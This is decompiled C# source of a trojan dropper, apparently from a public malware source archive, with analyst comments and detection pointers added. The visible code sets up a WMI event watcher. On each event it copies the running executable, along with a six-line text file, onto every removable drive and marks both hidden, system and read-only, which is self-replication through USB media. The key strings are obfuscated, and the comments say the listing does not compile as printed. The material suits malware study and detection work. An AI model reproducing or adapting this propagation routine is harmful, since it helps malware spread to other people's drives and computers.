mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-26 21:35:27 +00:00
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using \u000F;
using System;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Runtime.InteropServices;
using System.Threading;
// Analyst summary (decompiled output, identifiers obfuscated): the class below
// registers a WMI event watcher and, whenever the watched event fires, writes two
// files onto every removable drive: a six-line text file and a copy of the running
// executable, both flagged System | Hidden | NotContentIndexed | ReadOnly.
// NOTE(review): the WMI scope, event class, condition, both file names and the six
// written lines are all obtained through \u0005.\u0001(<int>) and cannot be read
// from this listing. The overall shape is consistent with replication through
// removable media (MITRE ATT&CK T1091) - confirm once the strings are resolved.
// Detection pointers that follow from the visible code: an executable and a small
// text file created with Hidden + System attributes under the root of a removable
// volume, by a process that also holds a WMI event subscription.
namespace \u000F
{
  internal sealed class \u0005
  {
    // Two static fields share the obfuscated name \u0001 (legal in IL, not in C#,
    // so this listing does not compile as printed). They are told apart by usage:
    //   \u0005.\u0001(<int>)                 -> this \u0002-typed field, invoked like a
    //                                         delegate; its result is used wherever a
    //                                         string is expected. Presumably a lookup
    //                                         for obfuscated string constants - verify
    //                                         against the \u0002 / \u0003 types.
    //   \u0005.\u0001.Start()/Stop()/...     -> the ManagementEventWatcher field.
    [NonSerialized]
    internal static \u0002 \u0001;
    // The single WMI event watcher created by \u000F() and restarted by the handler.
    private static ManagementEventWatcher \u0001;

    // Sets up the WMI event subscription and attaches the handler overload below.
    // Any exception during setup is swallowed; if a watcher object already exists
    // at that point it is stopped, otherwise the method just returns.
    public static void \u000F()
    {
      // Scope path comes from string id 8131 (value not visible here).
      ManagementScope scope = new ManagementScope(\u0005.\u0001(8131));
      // Asks WMI to enable the caller's privileges for this connection.
      scope.Options.EnablePrivileges = true;
      try
      {
        Thread.Sleep(50);
        \u0005.\u0001 = new ManagementEventWatcher(scope, (EventQuery) new WqlEventQuery()
        {
          // Event class (id 8148) and filter condition (id 8181) are not visible.
          // NOTE(review): since the handler only acts on removable drives, the
          // query presumably targets volume/device arrival - TODO confirm.
          EventClassName = \u0005.\u0001(8148),
          // WITHIN 3 seconds: the polling interval of the WQL event query.
          WithinInterval = new TimeSpan(0, 0, 3),
          Condition = \u0005.\u0001(8181)
        });
        // Wire the (object, EventArgs) overload of \u000F as the event callback.
        \u0005.\u0001.EventArrived += new EventArrivedEventHandler(\u0005.\u000F);
        \u0005.\u0001.Start();
      }
      catch
      {
        // Bare catch: every failure above is silent.
        if (\u0005.\u0001 == null)
          return;
        \u0005.\u0001.Stop();
      }
    }

    // EventArrived callback. Neither argument is read; the method re-enumerates
    // all drives on every invocation and processes each removable one.
    public static void \u000F([In] object obj0, [In] EventArgs obj1)
    {
      foreach (DriveInfo drive in DriveInfo.GetDrives())
      {
        if (drive.DriveType == DriveType.Removable)
        {
          try
          {
            Thread.Sleep(50);
            // Remove earlier copies of both artefacts (string ids 8246 and 8263,
            // appended directly to drive.Name). Failures are ignored.
            if (File.Exists(drive.Name + \u0005.\u0001(8246)))
              File.Delete(drive.Name + \u0005.\u0001(8246));
            if (File.Exists(drive.Name + \u0005.\u0001(8263)))
              File.Delete(drive.Name + \u0005.\u0001(8263));
          }
          catch
          {
          }
          // Artefact 1 (id 8246): a text file of exactly six lines, contents taken
          // from ids 8280, 8293, 8314, 8371, 8396 and 8429. This part is outside
          // any try block, so an I/O error here propagates out of the handler.
          StreamWriter streamWriter = new StreamWriter(drive.Name + \u0005.\u0001(8246));
          streamWriter.WriteLine(\u0005.\u0001(8280));
          streamWriter.WriteLine(\u0005.\u0001(8293));
          streamWriter.WriteLine(\u0005.\u0001(8314));
          streamWriter.WriteLine(\u0005.\u0001(8371));
          streamWriter.WriteLine(\u0005.\u0001(8396));
          streamWriter.WriteLine(\u0005.\u0001(8429));
          streamWriter.Close();
          Thread.Sleep(50);
          // Existing attributes are kept and System, Hidden, NotContentIndexed and
          // ReadOnly are OR-ed in, which hides the file from default Explorer views.
          File.SetAttributes(drive.Name + \u0005.\u0001(8246), File.GetAttributes(drive.Name + \u0005.\u0001(8246)) | FileAttributes.System | FileAttributes.Hidden | FileAttributes.NotContentIndexed | FileAttributes.ReadOnly);
          try
          {
            // Artefact 2 (id 8263): a copy of the currently running executable
            // image, given the same attribute set as the text file.
            File.Copy(Process.GetCurrentProcess().MainModule.FileName, drive.Name + \u0005.\u0001(8263));
            File.SetAttributes(drive.Name + \u0005.\u0001(8263), File.GetAttributes(drive.Name + \u0005.\u0001(8263)) | FileAttributes.System | FileAttributes.Hidden | FileAttributes.NotContentIndexed | FileAttributes.ReadOnly);
          }
          finally
          {
            // try/finally without catch: the 2-second pause always runs, and a
            // failed copy still propagates to the caller afterwards.
            Thread.Sleep(2000);
          }
        }
        // Runs once per enumerated drive, removable or not: the watcher is stopped
        // when it exists and then started again. As decompiled, only Stop() is
        // covered by the null check; Start() is unconditional.
        if (\u0005.\u0001 != null)
          \u0005.\u0001.Stop();
        \u0005.\u0001.Start();
      }
    }

    // Type initializer: delegates to \u0003.\u000F(), defined outside this listing.
    // NOTE(review): presumably this is where the \u0002-typed field \u0001 gets
    // assigned before first use - verify in the \u0003 type.
    static \u0005() => \u0003.\u000F();
  }
}